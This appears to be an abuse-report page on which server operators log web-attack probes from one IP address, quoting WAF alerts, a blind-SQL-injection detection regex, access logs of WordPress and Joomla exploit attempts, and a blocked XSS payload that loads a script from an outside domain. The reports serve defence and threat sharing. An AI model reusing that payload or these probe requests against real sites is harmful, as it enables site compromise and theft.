๐ฒ๐พ
Rizzy
2026-07-24 12:25:01
(16 hours ago)
Multiple WAF Violations
Brute-Force
Web App Attack
๐บ๐ธ
masterguru
2026-07-24 04:39:47
(1 day ago)
Detects blind sqli tests using sleep() or benchmark(). Pattern match "(?i:sleep\\\\(\\\\s*?\\\\d*?\\ ...
show more
Detects blind sqli tests using sleep() or benchmark(). Pattern match "(?i:sleep\\\\(\\\\s*?\\\\d*?\\\\s*?\\\\)|benchmark\\\\(.*?\\\\,.*?\\\\))" at ARGS:requests.requests.body.requests.requests.path. (942160-169)
show less
Hacking
๐ซ๐ท
Kimax
2026-07-23 21:20:50
(1 day ago)
RdpGuard detected brute-force attempt on HTTP
Brute-Force
๐ฉ๐ช
LRob
2026-07-23 15:48:55
(1 day ago)
CrowdSec: crowdsecurity/http-cve-probing | req: /wp-json/batch/v1 | UA: Mozilla/5.0 (Windows NT 10.0 ...
show more
CrowdSec: crowdsecurity/http-cve-probing | req: /wp-json/batch/v1 | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
show less
Web App Attack
๐ซ๐ท
dynamix
2026-07-23 02:00:51
(2 days ago)
Multiple WAF Violations
Web App Attack
๐จ๐ญ
Origon
2026-07-23 00:43:06
(2 days ago)
http-cve-probing - IP: 144.172.104.129 - time="2026-07-23T02:41:42+02:00" level=info msg="(555f66b4 ...
show more
http-cve-probing - IP: 144.172.104.129 - time="2026-07-23T02:41:42+02:00" level=info msg="(555f66b4f6a74558bc11e3f93469658es8App0Mcc0TKEeje/crowdsec) crowdsecurity/http-cve-probing by ip 144.172.104.129 (US/14956) : 4h ban on Ip 144.172.104.129" module=db
show less
Web App Attack
๐จ๐ฑ
SinaiCL
2026-07-22 03:55:13
(3 days ago)
WAF Multiple Hits
Bad Web Bot
Web App Attack
Anonymous
2026-07-22 00:34:30
(3 days ago)
Attack detected: 144.172.104.129 [2026-07-22]
Categories: 21
--- wp2shell/batch exploit (45 hits) -- ...
show more
Attack detected: 144.172.104.129 [2026-07-22]
Categories: 21
--- wp2shell/batch exploit (45 hits) ---
144.172.104.129 - - [19/Jul/2026:22:59:00 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 5194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
144.172.104.129 - - [19/Jul/2026:22:59:00 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 5195 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
144.172.104.129 - - [19/Jul/2026:22:59:01 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 5194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
144.172.104.129 - - [19/Jul/2026:22:59:01 +0000] "POST /wp-json/batch/v1 HTTP/1.1" 207 5194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
144.172.104.129 - - [19/Jul/2026:22:59:02 +0000] "POST /wp-json/batch/v1 HTTP/1.1"
show less
Web App Attack
๐ต๐ฑ
TaKeN
2026-07-20 20:46:12
(4 days ago)
Automated Wazuh local observation. Wazuh rule 31151 lvl=10 detected repeated HTTP web application pr ...
show more
Automated Wazuh local observation. Wazuh rule 31151 lvl=10 detected repeated HTTP web application probing from this source IP. Observed 1 matching blocked event(s) between 2026-07-20T22:46:12+02:00 and 2026-07-20T22:46:12+02:00. Sample requested paths: /wp-json/batch/v1.
show less
Web App Attack
Hacking
๐ฎ๐ฉ
rvsdi
2026-07-17 14:01:15
(1 week ago)
[OGWAF] xss attack blocked | severity: critical | POST /index.php?option=com_ajax&plugin=helixultima ...
show more
[OGWAF] xss attack blocked | severity: critical | POST /index.php?option=com_ajax&plugin=helixultimate&group=system&format=json&task=saveMegaMenuSettings | UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Sa | payload: id=101&settings[megamenu]=1&settings[showtitle]=1&settings[width]=100&settings[layout]=[]&settings[badge]=<script src="https://xdxd.warnightkardesim.icu/injct.js"></script>
show less
Web App Attack
Hacking
๐ฉ๐ช
FeG Deutschland
2026-07-12 13:48:03
(1 week ago)
Looking for CMS/PHP/SQL vulnerablilities/excessive crawling - 12
Exploited Host
Web App Attack
๐ฉ๐ช
marten_o
2026-07-07 12:09:07
(2 weeks ago)
144.172.104.129 - - [07/Jul/2026:14:09:07 +0200] "GET /tmp/poc-11325.xml.php HTTP/1.1" 500 575 "-" " ...
show more
144.172.104.129 - - [07/Jul/2026:14:09:07 +0200] "GET /tmp/poc-11325.xml.php HTTP/1.1" 500 575 "-" "Mozilla/5.0 (CVE-2026-48907-pocs)" 273 773
...
show less
Web App Attack
๐ซ๐ท
largo-it.net
2026-07-01 15:55:22
(3 weeks ago)
Jul 1 17:55:20 vps-9f3cdc33 haproxy[1085475]: 144.172.104.129:51798 [01/Jul/2026:17:55:20.370] www_ ...
show more
Jul 1 17:55:20 vps-9f3cdc33 haproxy[1085475]: 144.172.104.129:51798 [01/Jul/2026:17:55:20.370] www_frontend~ finance_cluster/finance1_test1_https 0/0/10/38/48 404 3297 - - ---- 74/18/0/0/0 0/0 "POST /index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon HTTP/1.1"
Jul 1 17:55:20 vps-9f3cdc33 haproxy[1085475]: 144.172.104.129:51798 [01/Jul/2026:17:55:20.559] www_frontend~ finance_cluster/finance1_test1_https 0/0/10/44/54 404 3196 - - ---- 74/18/0/0/0 0/0 "POST /index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon HTTP/1.1"
Jul 1 17:55:20 vps-9f3cdc33 haproxy[1085475]: 144.172.104.129:51798 [01/Jul/2026:17:55:20.754] www_frontend~ finance_cluster/finance1_test1_https 0/0/11/44/55 404 3196 - - ---- 74/18/0/0/0 0/0 "POST /index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon HTTP/1.1"
Jul 1 17:55:21 vps-9f3cdc33 haproxy[1085475]: 144.172.104.129:51798 [01/Jul/2026:17:55:20.949] www_frontend~ finance_cluster/finance1_test1_https 0/0/10/46/56 404 3196 - - ----
...
show less
Hacking
Bad Web Bot
Web App Attack
๐ซ๐ท
Thaliruth
2026-07-01 14:34:49
(3 weeks ago)
144.172.104.129 - - [01/Jul/2026:16:34:48 +0200] "GET /administrator/components/com_jce/jce.xml HTTP ...
show more
144.172.104.129 - - [01/Jul/2026:16:34:48 +0200] "GET /administrator/components/com_jce/jce.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
...
show less
Brute-Force
Web App Attack
๐บ๐ธ
mnsf
2026-04-06 15:05:39
(3 months ago)
Request Overload (118)
Brute-Force
Web App Attack